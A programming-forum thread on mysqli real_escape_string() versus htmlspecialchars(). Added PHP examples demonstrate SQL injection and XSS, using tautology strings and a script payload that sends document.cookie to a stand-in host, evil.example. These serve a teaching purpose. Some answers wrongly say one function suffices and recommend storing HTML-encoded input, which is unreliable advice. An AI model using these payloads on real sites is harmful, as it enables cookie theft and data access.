Nura111
asked on
When would I need to use the real_escape_string() function in the mysqli class?
I read the explanation in http://php.net/manual/en/function.stripslashes.php
but I'm not sure I understand what it does and when to use it.
Use it on everything that is not an internally generated integer. It will cause no harm and may save your bacon some day!
ASKER
Is it also a security issue if I don't use it?
Yes, it can prevent a foreign agent from injecting information into your queries. Look up SQL injection on this and other sites:
http://en.wikipedia.org/wiki/SQL_injection
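An added example (not part of the original thread) of the injection the answer above refers to. mysqli needs a running MySQL server, so this uses PDO with an in-memory SQLite database (it assumes PHP's pdo_sqlite extension); the table, its rows and the attacker strings are constructed for the demo. PDO::quote() stands in for $mysqli->real_escape_string(), and the prepared statement corresponds to $mysqli->prepare() followed by bind_param().

```php
<?php
// Added example, not from the original thread: how an unescaped value changes a
// query, and how escaping or a prepared statement avoids it. Assumes pdo_sqlite.
declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, api_key TEXT)');
    // Constructed sample rows.
    $ins = $db->prepare('INSERT INTO users (email, api_key) VALUES (?, ?)');
    $ins->execute(['alice@example.com', 'key-alice']);
    $ins->execute(['bob@example.com', 'key-bob']);
    return $db;
}

// Vulnerable: the user-supplied value is spliced straight into the SQL text,
// so a quote in the input ends the literal and the rest becomes SQL.
function findByEmailUnsafe(PDO $db, string $email): array
{
    $sql = "SELECT email FROM users WHERE email = '$email'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Escaped: PDO::quote() is the PDO analogue of mysqli::real_escape_string()
// (it also adds the surrounding quotes). This only works because the value
// sits inside a quoted string literal.
function findByEmailEscaped(PDO $db, string $email): array
{
    $sql = 'SELECT email FROM users WHERE email = ' . $db->quote($email);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Preferred: a prepared statement keeps the value out of the SQL text entirely,
// so there is no escaping decision to get wrong.
function findByEmailPrepared(PDO $db, string $email): array
{
    $stmt = $db->prepare('SELECT email FROM users WHERE email = ?');
    $stmt->execute([$email]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// The limit of escaping: in an unquoted numeric position there is no quote to
// escape. "1 OR 1=1" passes through real_escape_string() unchanged and still
// returns every row; only a prepared statement or an (int) cast stops it.
function findByIdUnsafe(PDO $db, string $id): array
{
    return $db->query("SELECT email FROM users WHERE id = $id")->fetchAll(PDO::FETCH_COLUMN);
}

$db = makeDb();
$attack = "' OR '1'='1"; // classic tautology injection, constructed for the demo

printf("unsafe:   %d rows\n", count(findByEmailUnsafe($db, $attack)));
printf("escaped:  %d rows\n", count(findByEmailEscaped($db, $attack)));
printf("prepared: %d rows\n", count(findByEmailPrepared($db, $attack)));
printf("numeric:  %d rows\n", count(findByIdUnsafe($db, '1 OR 1=1')));
```

Run it with `php inject.php`. The unsafe lookup returns both users for the tautology input because the query has become `WHERE email = '' OR '1'='1'`; the escaped and prepared lookups return none, since the quote is now part of the compared value. The last function shows why the first answer singles out "internally generated integers": in a numeric position escaping has nothing to act on, so validate or cast the value, or bind it as a parameter.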
ASKER
Is it the same issue as not using htmlspecialchars() on an input from a user?
Is there a need to use both?
ASKER
Another thing: so you mean to use mysql_real_escape_string()
on the input before it's been used to insert into the db or other, right?
So what is the issue when using {$row['id']} in an html form, e.g.
<td>{$row['id']}</td>
<td>{$row['timestamp']}</td>
<td>{$row['email_address']}</td>
<td>{$fromAddress}</td>
without htmlspecialchars() before? I've been told it's a security issue as well; I don't understand why.
You do not need to use both. I personally prefer and use htmlspecialchars() on all text input.
The difference is that mysql_real_escape_string just safeties the SQL injection hacking, but not certain other kinds of things. htmlspecialchars changes ALL special characters into their html &#xxx code equivalents.
The only drawback to using htmlspecialchars is that it takes a few more bytes in your database ... each special character takes 5 bytes instead of 1 ... so if you have a LOT of text with special characters stored, that might be a problem.
The advantage of using htmlspecialchars is that it safeties more things, for example not letting some evil javascript into your database that might be exploited later.
The real_escape_string() function places a backslash before certain dangerous characters: NUL (ASCII 0), \n, \r, \, ', ", and Control-Z (http://it.php.net/manual/en/mysqli.real-escape-string.php). This is useful every time you have to insert values into a database, since it prevents bad data from being inserted. As the PHP manual says, you have to use this function every time you send a query to MySQL.
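The answer recommending htmlspecialchars() over real_escape_string(), and the last answer listing the characters real_escape_string() escapes, are both illustrated by the following added example (not from the thread). It runs the same constructed inputs through a SQL escaper and through htmlspecialchars() to show that the two functions address different contexts: the SQL string literal and the HTML page. sqlEscapeDemo() re-implements the character list from the last answer purely for illustration; it is not a substitute for $mysqli->real_escape_string(), which needs an open connection because it honours the connection's character set. renderCell() and buildInsert() are hypothetical helpers written for the demo.

```php
<?php
// Added example, not from the original thread: SQL escaping and HTML encoding
// protect different contexts, so one does not cover the other.
declare(strict_types=1);

// Illustration of the documented character list for mysqli::real_escape_string():
// NUL, \n, \r, \, ', " and Control-Z each get a backslash. Demo only; the real
// method is charset-aware and requires a connection.
function sqlEscapeDemo(string $s): string
{
    return strtr($s, [
        "\0"   => '\\0',
        "\n"   => '\\n',
        "\r"   => '\\r',
        '\\'   => '\\\\',
        "'"    => "\\'",
        '"'    => '\\"',
        "\x1a" => '\\Z',
    ]);
}

// Build the INSERT the way the thread does: value inside a quoted literal.
function buildInsert(string $email): string
{
    return "INSERT INTO contacts (email_address) VALUES ('" . sqlEscapeDemo($email) . "')";
}

// Render one table cell like the asker's snippet, but encoding at output time.
// ENT_QUOTES is passed explicitly: before PHP 8.1 the default (ENT_COMPAT)
// leaves single quotes untouched.
function renderCell(string $value): string
{
    return '<td>' . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Constructed inputs: one aims at the SQL, one at the browser, one is a
// legitimate value that needs escaping in one context and encoding in the other.
$inputs = [
    'sql'  => "x@example.com' OR '1'='1",
    'xss'  => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    'both' => "O'Brien <b>hi</b>",
];

foreach ($inputs as $label => $raw) {
    echo "== $label ==\n";
    echo "SQL:  ", buildInsert($raw), "\n";
    echo "HTML: ", renderCell($raw), "\n";
    // What storing the HTML-encoded form looks like: the quote is gone from the
    // SQL only because it became &#039;, and the stored data is no longer the
    // value the user typed.
    echo "HTML-encoded, then SQL: ", buildInsert(htmlspecialchars($raw, ENT_QUOTES, 'UTF-8')), "\n\n";
}
```

For the `xss` input the SQL line is harmless: the script tag contains nothing that needs SQL escaping, so it reaches the database intact, and the danger only appears when the value is echoed into a `<td>` without htmlspecialchars(); the HTML line shows the encoded, inert form. Conversely, htmlspecialchars() never touches a backslash or an input such as `1 OR 1=1`, so it is not an SQL injection defence. Encoding at output time, as renderCell() does, keeps the stored value usable for mail, JSON or CSV and avoids double-encoding; the third line of each group shows how storing the encoded form turns a legitimate name like O'Brien into `O&#039;Brien` in the database.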